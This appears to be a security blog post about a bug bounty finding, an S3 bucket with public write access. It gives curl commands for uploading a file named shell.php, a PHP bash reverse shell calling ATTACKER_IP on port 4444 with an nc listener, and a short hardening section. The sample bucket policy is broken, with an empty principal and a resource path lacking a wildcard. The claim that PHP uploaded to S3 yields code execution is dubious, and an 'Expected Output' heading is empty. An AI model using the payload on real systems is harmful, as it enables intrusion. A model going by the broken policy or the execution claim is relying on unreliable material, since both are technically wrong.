Misconfigured S3 Bucket Allows Arbitrary File Upload and Code Execution

Listen to this Post

Featured Image
A misconfigured Amazon S3 bucket was discovered during a bug bounty program (BBP) reconnaissance, allowing arbitrary file uploads and potential remote code execution (RCE). Here’s how the vulnerability was exploited:

  1. Discovery: A public S3 bucket subdomain was identified during recon.
  2. Interception: The request was captured using Burp Suite.
  3. Method Manipulation: The HTTP method was changed to PUT, and a file (poc.txt) was uploaded.
  4. Successful Upload: The file was accessible via the domain or a `GET` request.
  5. File Format Testing: Various extensions (.php, .html, .js) were tested—all were successfully uploaded.
  6. Reverse Shell Upload: A malicious script (e.g., PHP reverse shell) was uploaded, which could lead to RCE if triggered.
  7. Impact: Attackers could upload and execute arbitrary malicious files.

You Should Know:

1. Testing S3 Bucket Misconfigurations

Use these commands to check for misconfigured S3 buckets:

aws s3 ls s3://bucket-name --no-sign-request 
curl -X PUT https://bucket-name.s3.amazonaws.com/test.txt -d "test" 

2. Exploiting Arbitrary Uploads

To test for file upload vulnerabilities:

 Upload a test file 
echo "malicious content" > shell.php 
curl -X PUT https://vulnerable-bucket.s3.amazonaws.com/shell.php --data-binary @shell.php

Verify access 
curl https://vulnerable-bucket.s3.amazonaws.com/shell.php 

3. Reverse Shell via S3 Bucket

If PHP files are executable, upload a reverse shell (e.g., PentestMonkey’s PHP reverse shell):

<?php 
exec("/bin/bash -c 'bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1'"); 
?> 

Start a listener on your machine:

nc -lvnp 4444 

4. Securing S3 Buckets

To prevent such issues:

  • Disable public write access.
  • Use bucket policies to restrict uploads:
    {
    "Version": "2012-10-17",
    "Statement": [
    {
    "Effect": "Deny",
    "Principal": "",
    "Action": "s3:PutObject",
    "Resource": "arn:aws:s3:::bucket-name/"
    }
    ]
    }
    

What Undercode Say

Misconfigured S3 buckets remain a critical attack vector. Automation tools like `s3scanner` or `lazyS3` can help identify exposed buckets. Always validate permissions and enforce least-privilege access.

Prediction

As cloud adoption grows, misconfigured storage services will continue to be a top attack surface, leading to more data breaches and RCE incidents.

Expected Output:

References:

Reported By: Sayedv2 Bugbounty – Hackers Feeds
Extra Hub: Undercode MoN
Basic Verification: Pass ✅

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram